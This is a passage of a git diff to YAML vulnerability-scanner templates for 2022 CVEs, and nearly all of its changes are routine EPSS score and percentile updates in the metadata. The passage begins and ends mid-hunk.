cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index ed153a71cf..f881566ed0 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-24265 cwe-id: CWE-89 epss-score: 0.06646 - epss-percentile: 0.93036 + epss-percentile: 0.9304 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 70b4e9366f..a117cc6b11 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24266 cwe-id: CWE-89 epss-score: 0.04519 - epss-percentile: 0.91536 + epss-percentile: 0.91547 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index 058b9acf56..9a1fef6f55 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.35149 + epss-percentile: 0.3516 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 226c61e799..2619e695be 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2462 cwe-id: CWE-200 epss-score: 0.01386 - epss-percentile: 0.84904 + epss-percentile: 0.84911 cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 986267fb57..fa2da0ecf9 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2467 cwe-id: CWE-89 epss-score: 0.01454 - epss-percentile: 0.85236 + epss-percentile: 0.85243 cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index aa67bc6e68..6f56b2048d 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-24681 cwe-id: CWE-79 epss-score: 0.00155 - epss-percentile: 0.51749 + epss-percentile: 0.51772 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 06adf31a32..b675b904f0 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24716 cwe-id: CWE-22 epss-score: 0.19292 - epss-percentile: 0.95703 + epss-percentile: 0.95706 cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index b71d6c04da..97f9b46d76 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-24816 cwe-id: CWE-94 epss-score: 0.87558 - epss-percentile: 0.98307 + epss-percentile: 0.98308 cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index ceeb586f3e..8277c5f048 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-24856 cwe-id: CWE-918 epss-score: 0.0639 - epss-percentile: 0.92877 + epss-percentile: 0.92881 cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 1bba154eb7..53b83a9186 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2487 cwe-id: CWE-78 epss-score: 0.97399 - epss-percentile: 0.99895 + epss-percentile: 0.99896 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index daba24d8e8..1f57b85744 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2488 cwe-id: CWE-78 epss-score: 0.97387 - epss-percentile: 0.99887 + epss-percentile: 0.99888 cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index d7909b9816..69a034344b 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24899 cwe-id: CWE-79 epss-score: 0.00402 - epss-percentile: 0.70766 + epss-percentile: 0.70791 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 6deacaba5b..c470ac79f3 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24900 cwe-id: CWE-668,CWE-22 epss-score: 0.01655 - epss-percentile: 0.86198 + epss-percentile: 0.86203 cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index d91aabe1d4..f4052ac414 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-24990 cwe-id: CWE-306 epss-score: 0.93762 - epss-percentile: 0.98857 + epss-percentile: 0.98858 cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 5282f96938..34893e93da 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-78 epss-score: 0.0417 - epss-percentile: 0.91211 + epss-percentile: 0.91216 cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 1eaf48847b..ad866b5d25 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-25125 cwe-id: CWE-89 epss-score: 0.02036 - epss-percentile: 0.87712 + epss-percentile: 0.87718 cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 594b190df3..df68fe5237 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25148 cwe-id: CWE-89 epss-score: 0.10089 - epss-percentile: 0.94285 + epss-percentile: 0.9429 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index dc03de0572..c27100105b 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-25149 cwe-id: CWE-89 epss-score: 0.34697 - epss-percentile: 0.96629 + epss-percentile: 0.9663 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index caf6b47b7a..694e5ae3ae 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-25216 cwe-id: CWE-22 epss-score: 0.01312 - epss-percentile: 0.84466 + epss-percentile: 0.84473 cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index 0e4bbea3d2..e9401c1cf3 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-25323 cwe-id: CWE-79 epss-score: 0.00115 - epss-percentile: 0.44971 + epss-percentile: 0.44993 cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 3d08e9258c..7570b83f01 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-2535 cwe-id: CWE-639 epss-score: 0.00271 - epss-percentile: 0.64281 + epss-percentile: 0.64316 cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 6eeb029d75..95720de47e 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-25356 cwe-id: CWE-91 epss-score: 0.00425 - epss-percentile: 0.71489 + epss-percentile: 0.71515 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index 90b02ca130..51bd289b9e 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2544 cwe-id: CWE-425 epss-score: 0.00551 - epss-percentile: 0.74971 + epss-percentile: 0.74993 cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 4465b1e88e..6e80834014 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2546 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.51223 + epss-percentile: 0.5125 cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index af34f94ba1..42c097b9c2 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-25481 cwe-id: CWE-668 epss-score: 0.01285 - epss-percentile: 0.8431 + epss-percentile: 0.84318 cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index 72ab2e1bab..16584cc1f9 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-25485 cwe-id: CWE-829 epss-score: 0.00588 - epss-percentile: 0.75859 + epss-percentile: 0.75881 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index fbbc64dc22..eb1a37e43b 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-25486 cwe-id: CWE-829 epss-score: 0.01614 - epss-percentile: 0.8606 + epss-percentile: 0.86065 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 04bf6cd525..347d11bd5f 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-25487 cwe-id: CWE-434 epss-score: 0.88802 - epss-percentile: 0.98371 + epss-percentile: 0.98373 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 25daf90704..699167eb11 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-25488 cwe-id: CWE-89 epss-score: 0.01192 - epss-percentile: 0.83595 + epss-percentile: 0.83605 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index e6fd883306..e2a90c9d6b 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-25489 cwe-id: CWE-79 epss-score: 0.00992 - epss-percentile: 0.81897 + epss-percentile: 0.81908 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 76e9cc910d..2b21d30590 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-25497 cwe-id: CWE-552 epss-score: 0.00611 - epss-percentile: 0.76322 + epss-percentile: 0.76344 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index b52084319e..5b498380cf 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2551 cwe-id: CWE-425 epss-score: 0.79836 - epss-percentile: 0.97946 + epss-percentile: 0.97948 cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index 60e190ff05..7800fb6afc 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-25568 cwe-id: CWE-1188 epss-score: 0.01802 - epss-percentile: 0.86794 + epss-percentile: 0.86797 cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index b24ff1dbfa..ac80e42639 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2599 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45838 + epss-percentile: 0.45853 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index e73eba7395..3a81c9b718 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-26148 cwe-id: CWE-312 epss-score: 0.22873 - epss-percentile: 0.95983 + epss-percentile: 0.95985 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 1f4865fcc5..55d44c00cf 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-26159 cwe-id: CWE-425 - epss-score: 0.00501 - epss-percentile: 0.73699 + epss-score: 0.00597 + epss-percentile: 0.76049 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 5ea58072d1..668a058001 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-26233 cwe-id: CWE-22 epss-score: 0.00631 - epss-percentile: 0.76743 + epss-percentile: 0.76763 cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 7931ff216d..6bddb1e516 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-26263 cwe-id: CWE-79 epss-score: 0.00147 - epss-percentile: 0.50483 + epss-percentile: 0.50508 cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index ca5c14b922..bbce9092b5 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-2627 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32949 + epss-percentile: 0.32958 cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index fd3e354bb2..5e8da8bf01 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2633 cwe-id: CWE-73,CWE-610 epss-score: 0.05267 - epss-percentile: 0.92174 + epss-percentile: 0.92181 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a46363f609239e1e21ab542605ec1baf62e7808ad9be56b26f021b9996d56fa2022100bd09052bacd7cc3b32d37eddbde4ca3e8a88143194f51e6115184555429c6190:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a46363f609239e1e21ab542605ec1baf62e7808ad9be56b26f021b9996d56fa2022100bd09052bacd7cc3b32d37eddbde4ca3e8a88143194f51e6115184555429c6190:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index ddc39c517d..98b9f8512c 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-26352 cwe-id: CWE-22 epss-score: 0.97472 - epss-percentile: 0.99958 + epss-percentile: 0.99957 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 635489fa85..f7c6aa4508 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-26564 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47412 + epss-percentile: 0.47423 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 3107d3a7bc..9f1caafeb5 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-26833 cwe-id: CWE-306 epss-score: 0.01499 - epss-percentile: 0.85446 + epss-percentile: 0.85452 cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index 515f1dcaa4..461fb3d537 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-26960 cwe-id: CWE-22 epss-score: 0.92542 - epss-percentile: 0.98705 + epss-percentile: 0.98707 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 2cf8bdb215..2e0446443c 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2733 cwe-id: CWE-79 epss-score: 0.00198 - epss-percentile: 0.57452 + epss-percentile: 0.5748 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 8f088f6b76..59325d6c5e 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-2756 cwe-id: CWE-918 - epss-score: 0.00724 - epss-percentile: 0.78534 + epss-score: 0.00857 + epss-percentile: 0.80425 cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index b6cf450b82..fc6fa86ac9 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-27593 cwe-id: CWE-610 epss-score: 0.39295 - epss-percentile: 0.96839 + epss-percentile: 0.96842 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index f5e56e59ae..7b4e1b56a2 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-27849 cwe-id: CWE-200 epss-score: 0.00826 - epss-percentile: 0.80048 + epss-percentile: 0.80061 cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index 53598d47b7..0cd36590eb 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-27926 cwe-id: CWE-79 epss-score: 0.91058 - epss-percentile: 0.98533 + epss-percentile: 0.98534 cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index 2dadbbe780..803d931bcc 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-27927 cwe-id: CWE-89 epss-score: 0.04625 - epss-percentile: 0.91634 + epss-percentile: 0.91644 cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 1d72977eab..0efce5bd6e 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-27984 cwe-id: CWE-89 epss-score: 0.01333 - epss-percentile: 0.84576 + epss-percentile: 0.84583 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index e5be2f1c8b..7bb7aec78b 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-27985 cwe-id: CWE-89 epss-score: 0.01382 - epss-percentile: 0.84884 + epss-percentile: 0.8489 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml index 6ff87d9234..5c3cefb730 100644 --- a/http/cves/2022/CVE-2022-28022.yaml +++ b/http/cves/2022/CVE-2022-28022.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-28022 cwe-id: CWE-89 epss-score: 0.01261 - epss-percentile: 0.84123 + epss-percentile: 0.84132 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index 704f05e0bd..7055c940bb 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-28023 cwe-id: CWE-89 epss-score: 0.01261 - epss-percentile: 0.84123 + epss-percentile: 0.84132 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index b41205d08c..e92c6cce1a 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-28032 cwe-id: CWE-89 epss-score: 0.01261 - epss-percentile: 0.84123 + epss-percentile: 0.84132 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 05f6d15f4e..73c52f6ee7 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-28079 cwe-id: CWE-89 epss-score: 0.82769 - epss-percentile: 0.98058 + epss-percentile: 0.98059 cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index d2eef789ce..c8346e389b 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ 